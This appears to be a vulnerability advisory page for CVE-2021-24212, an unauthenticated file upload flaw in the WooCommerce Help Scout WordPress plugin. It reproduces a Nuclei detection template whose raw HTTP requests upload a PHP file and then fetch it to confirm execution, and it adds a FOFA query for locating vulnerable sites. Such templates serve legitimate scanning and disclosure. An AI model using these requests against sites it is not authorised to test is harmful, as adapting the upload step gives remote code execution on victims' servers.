CVE-2021-24212: WooCommerce Help Scout - Arbitrary File Upload

日期: 2025-08-01 | 影响软件: WooCommerce Help Scout | POC: 已公开

漏洞描述

WooCommerce Help Scout plugin before version 2.9.1 contains an unrestricted file upload vulnerability. The vulnerability allows unauthenticated users to upload arbitrary files to the server which by default will end up in wp-content/uploads/hstmp/ directory, potentially leading to remote code execution.

PoC代码[已公开]

id: CVE-2021-24212

info:
  name: WooCommerce Help Scout - Arbitrary File Upload
  author: ritikchaddha
  severity: critical
  description: |
    WooCommerce Help Scout plugin before version 2.9.1 contains an unrestricted file upload vulnerability. The vulnerability allows unauthenticated users to upload arbitrary files to the server which by default will end up in wp-content/uploads/hstmp/ directory, potentially leading to remote code execution.
  impact: |
    Unauthenticated attackers can upload malicious files, potentially leading to remote code execution or site compromise.
  remediation: |
    Update to version 2.9.1 or later.
  reference:
    - https://wpscan.com/vulnerability/cf9305e8-f5bc-45c3-82db-0ef00fd46129/
    - https://sploitus.com/exploit?id=WPEX-ID:CF9305E8-F5BC-45C3-82DB-0EF00FD46129
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24212
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-24212
    cwe-id: CWE-434
    epss-score: 0.67074
    epss-percentile: 0.98573
  metadata:
    verified: false
    max-request: 2
    vendor: woocommerce
    product: help_scout
    fofa-query: body="/wp-content/plugins/woocommerce-help-scout"
  tags: cve,cve2021,wp,wordpress,wp-plugin,file-upload,rce,woocommerce-help-scout,vkev

variables:
  num: "999999999"
  filename: "{{rand_base(6)}}.php"

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=wc_help_scout_upload_attachments HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=------------------------NCpI6tN3BZW3fz1Y9t2bkf

        ------------------------NCpI6tN3BZW3fz1Y9t2bkf
        Content-Disposition: form-data; name="file"; filename="{{filename}}"
        Content-Type: application/x-php

        <?php echo md5('{{num}}'); ?>
        ------------------------NCpI6tN3BZW3fz1Y9t2bkf--

      - |
        GET /wp-content/uploads/hstmp/{{filename}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{md5(num)}}"

      - type: status
        status:
          - 200
# digest: 4a0a004730450221009f62edb97f6325988c8ff1b4c1747351597df6ad51e44929a84dd40686758c8302203a75d5d11af20b7be618c2df4543ca1c63de84fde881b50230ca2cc9f5b701fe:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-24212.yaml

相关漏洞推荐